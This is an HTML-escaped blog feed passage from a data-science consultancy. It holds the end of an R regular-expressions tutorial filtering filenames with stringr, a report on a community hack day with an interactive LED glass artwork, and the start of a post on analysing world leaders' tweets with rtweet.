&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Project-final2.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I&amp;rsquo;m also going to give us a task. The task is to be able to grab the files that have a format &amp;ldquo;project-objects&amp;rdquo;&amp;quot; or &amp;ldquo;project_objects&amp;rdquo;. Let&amp;rsquo;s say of those files we want the csv and ods files. i.e. we want to grab the files &amp;ldquo;project_cars.ods&amp;rdquo;, &amp;ldquo;project-houses.csv&amp;rdquo; and &amp;ldquo;project_Trees.csv&amp;rdquo;. As we introduce more regex we&amp;rsquo;ll gradually tackle our task.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-regular-expressions-every-r-programmer-should-know"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="regex-the-backslash-"&gt;Regex: The backslash, &lt;code&gt;\&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Here we go! Our first regular expression. When typing regular expressions, there are a group of special characters called metacharacters that have other functions. These are:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.{()\^$|?*+
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The backslash is &lt;em&gt;SUPER&lt;/em&gt; important because if we want to search for any of these characters without using their built in function we must escape the character with a backslash. For example, if we wanted to extract the names of the name of all csv files then perhaps we would think to search for the string &amp;ldquo;.csv&amp;rdquo;? Then we would do&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Hang on a second, what? Ah yes. The backslash is a metacharacter too! So to create a backslash for the function to search with, we need to escape the backslash!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project2.csv2.specs.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Much better. With regards to our task, this is already useful, as we want csv and ods files. However, you&amp;rsquo;ll notice when we searched for files contained the string &amp;ldquo;.csv&amp;rdquo;, we got files of type &amp;ldquo;.xlsx&amp;rdquo; as well, just because they had &amp;ldquo;.csv&amp;rdquo; somewhere in their name or extension. Up step the hat and dollar…&lt;/p&gt;
&lt;h2 id="regex-the-hat--and-dollar-"&gt;Regex: The hat ,&lt;code&gt;^&lt;/code&gt;, and dollar, &lt;code&gt;$&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;The hat and dollar are used to specify the start and end of a line respectively. For instance, all file names that start with &amp;ldquo;Proj&amp;rdquo; (take note of the capital &amp;ldquo;P&amp;rdquo;!)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^Proj&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Project_Trees.csv&amp;#34; &amp;#34;Project-final2.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So what if we wanted specifically just &amp;ldquo;.csv&amp;rdquo; or &amp;ldquo;.ods&amp;rdquo; files, just like in our task? We could use the dollar to search for files ending in a specific extension&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.ods$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can search for files that end in certain patterns. That&amp;rsquo;s all well and good, but we still can&amp;rsquo;t search for both together. Up step round parentheses and the pipe…&lt;/p&gt;
&lt;h2 id="regex-round-parentheses-and-the-pipe-"&gt;Regex: Round parentheses,&lt;code&gt;()&lt;/code&gt;, and the pipe, &lt;code&gt;|&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Round parentheses and the pipe are best used in conjuction with either other. The parentheses specify a group and the pipe means &amp;ldquo;or&amp;rdquo;. Now, we could search for files ending in a certain extension or another extension. For our task we need &amp;ldquo;.csv&amp;rdquo; and &amp;ldquo;.ods&amp;rdquo; files. Using the pipe&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$|\\.ods$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively we can use a group and pipe&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we don&amp;rsquo;t have to write surrounding expressions more than once. Of course there are other csv and ods files that we don&amp;rsquo;t want to collect. Now we need a way of specifiying a block of letters. Up step the square parentheses and the asterisk…&lt;/p&gt;
&lt;h2 id="regex-square-parentheses-and-the-asterisk-"&gt;Regex: Square parentheses,&lt;code&gt;[]&lt;/code&gt;, and the asterisk, &lt;code&gt;*&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;The square parentheses and asterisk. We can match a group of characters or digits using the square parentheses. Here I&amp;rsquo;m going to use a new function, &lt;code&gt;str_extract()&lt;/code&gt;. This does as it says on the tin, it &lt;em&gt;&lt;strong&gt;extracts&lt;/strong&gt;&lt;/em&gt; the parts of the text that match our pattern. For instance the last lower case letter in each element of the vector, if such a thing exists&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-z]$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;x&amp;#34; &amp;#34;s&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; NA &amp;#34;r&amp;#34; &amp;#34;s&amp;#34; &amp;#34;x&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice that one of the files ends with an upper case letter, so we get an &lt;code&gt;NA&lt;/code&gt;. To include this we add &amp;ldquo;A-Z&amp;rdquo; (to add numbers we add 0-9 and to add metacharacters we write them without escaping them)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;x&amp;#34; &amp;#34;s&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;R&amp;#34; &amp;#34;r&amp;#34; &amp;#34;s&amp;#34; &amp;#34;x&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, this is obviously useless at the moment. This is where does the asterisk comes into it. The asterisk is what is called a quantifier. There are three other quantifiers (&lt;code&gt;+&lt;/code&gt;, &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;{}&lt;/code&gt;), but won&amp;rsquo;t cover them here. A quantifier &lt;em&gt;&lt;strong&gt;quantifies&lt;/strong&gt;&lt;/em&gt; how many of the characters we want to match and the asterisk means we want 0 or more characters of the same form. For instance, we could now extract all of the file extensions if we wished to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]*$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;xlsx&amp;#34; &amp;#34;ods&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;R&amp;#34; &amp;#34;r&amp;#34; &amp;#34;xls&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [11] &amp;#34;xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So we go backwards from the end of the line collecting all the characters until we hit a character that isn&amp;rsquo;t a lower or upper case letter. We can now use this to grab the group letters preceeding the file extensions for our task&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Obviously we still have some pesky files in there that we don&amp;rsquo;t want. Up step the… only joking! We now actually have all the tools to complete the task. The filenames we want take the form project-objects or project_objects, so we know that preceeding that block of letters for &amp;ldquo;objects&amp;rdquo; we want either a dash or an underscore. We can use a group and pipe for this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project2-csv-specs.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We still have two pesky files sneaking in there. How do those two files and the three files we want differ? Well the files we want all start with &amp;ldquo;project-&amp;rdquo; or &amp;ldquo;project_&amp;rdquo; where as the other two don&amp;rsquo;t. We must also take note that the project could have a capital &amp;ldquo;P&amp;rdquo;. We can combat that using a group!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;(P|p)roject(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we had a huge file list, we&amp;rsquo;d want to stop files such as &amp;ldquo;2Project_Trees.csv&amp;rdquo; filtering in as well. So we can just use the hat to specify the start of a line&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^(P|p)roject(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Regular expressions are definitely a trade worth learning. They play a big role in modern data analytics. For a good table of metacharacters, quantifiers and useful regular expressions, see &lt;a href="https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expression-language-quick-reference" rel="external"&gt;this microsoft page&lt;/a&gt;. Remember, in R you have to double escape metacharacters!&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s all for now. Cheers for reading!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Photo by &lt;a href="https://unsplash.com/@ioanroman29"&gt;Ioan Roman&lt;/a&gt; on &lt;a href="https://unsplash.com/s/photos/regular-expression"&gt;Unsplash&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ReCoding the Wall: Mixing art and code</title><link>https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/</link><pubDate>Wed, 11 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we often collaborate with the local community. This includes attending regional events such as those run by Creative FUSE, a partnership between the North East’s five universities. I recently attended an event at the National Glass Centre called &lt;a href="http://www.designnetworknorth.org/events/recoding-wall-digital-making-day/" rel="external"&gt;ReCoding the Wall&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The artwork, Colour Field, is a large interactive LED wall currently on display at the National Glass Centre in Sunderland. This was an opportunity to investigate, experiment with, and modify a new artwork by Cate Watkinson and Colin Rennie. The artwork, Colour Field, is a large interactive LED wall currently on display at the National Glass Centre in Sunderland. Dominic Smith took &lt;a href="https://www.flickr.com/photos/dominicsmith/sets/72157689126146010/" rel="external"&gt;a few nice photos of the event&lt;/a&gt; and Suzy O’Hara helped organise and first recommended this event to me.&lt;/p&gt;
&lt;p&gt;The day began with coffee and an introduction to the two artists involved with the wall, an installation that had been on display in the &lt;a href="http://www.nationalglasscentre.com/about/whatson/details/?id=818" rel="external"&gt;National Glass Centre&lt;/a&gt;. Colin and Cate are both glass artists, while Cate often works on larger installations, Colin works with some more digital aspects of design, such as scanning organically shaped glass works at high resolution so that they may be reincorporated into new works with precision cut metalwork.&lt;/p&gt;
&lt;img class="image-center" src="wall15.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;We spent the morning getting to know each other and looking at some of the interesting machinery you might not expect in a glass centre such as a water jet CNC type machine that can cut through metal sheets up to 30mm thick with very high accuracy, or a ceramic 3D printer which thanks to the thicker nozzle required for liquid clay actually prints faster than your standard ABS (plastic) printers (not counting the drying and firing time required :-)).&lt;/p&gt;
&lt;p&gt;After lunch we would get to play with the hardware and software that control the lighting of 19x10x5 LED wall of glass and metal, Colour Field.&lt;/p&gt;
&lt;p&gt;Unfortunately, due to &lt;em&gt;The Beast from the East&lt;/em&gt; this event had been postponed and we would not be hacking on the wall in situ in the gallery, instead we travelled over the river to FabLab, part of a global network of digital fabrication spaces, where 3 of the panels would be waiting for our input.&lt;/p&gt;
&lt;p&gt;After a quick tour of the maker space (including a large laser cutter, vinyl cutters, CNC router, and full colour 3D printer!) we split into two groups to sketch out some possibilities of this wall.&lt;/p&gt;
&lt;img class="image-center" src="wall41.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;We had 3 of the 5 panels hooked up in the FabLab, this would still be plenty to work with, but much of the existing code was written with 5 panels in mind and a significant portion of the rendering being done on the Arduino itself rather than the computer with attached Kinect sensor. To allow everyone to render images freely on the wall the code on the Arduino based LED controller would have to be modified significantly.&lt;/p&gt;
&lt;p&gt;Ultimately we worked together with one team creating a sound reactive visualisation and emulator for the wall, another working on a text display for the relatively low resolution display that is the wall, and both teams working on the code running on the Arduino controlling each strip to remove references to the 5 panels and enable arbitrary imagery to be sent over serial, fully opening up the possibilities of what could be displayed. Although 3 hours was not quite enough to hook everything together, the emulator allowed everyone to easily demonstrate their ideas without needing to hook directly into the wall.&lt;/p&gt;
&lt;img class="image-center" src="wall57.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;I will no doubt be taking some of the knowledge I picked up back home with me to make my own miniature wall. Expect to see a short blog post about what I make next quite soon!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Which world leaders are twitter bots?</title><link>https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/</link><pubDate>Wed, 28 Mar 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#set-up"&gt;Set-up&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#getting-the-tweets"&gt;Getting the tweets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#are-world-leaders-actually-bots"&gt;Are world leaders actually bots?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="set-up"&gt;Set-up&lt;/h2&gt;
&lt;p&gt;Given that I do quite like twitter, I thought it would be a good idea to right about R’s interface to the twitter API; {rtweet}. As usual, we can grab the package in the usual way. We’re also going to need the {tidyverse} for the analysis, {rvest} for some initial webscraping of twitter names, {lubridate} for some date manipulation and {stringr} for some minor text mining.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rvest&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rvest&amp;#34;&lt;/span&gt;)
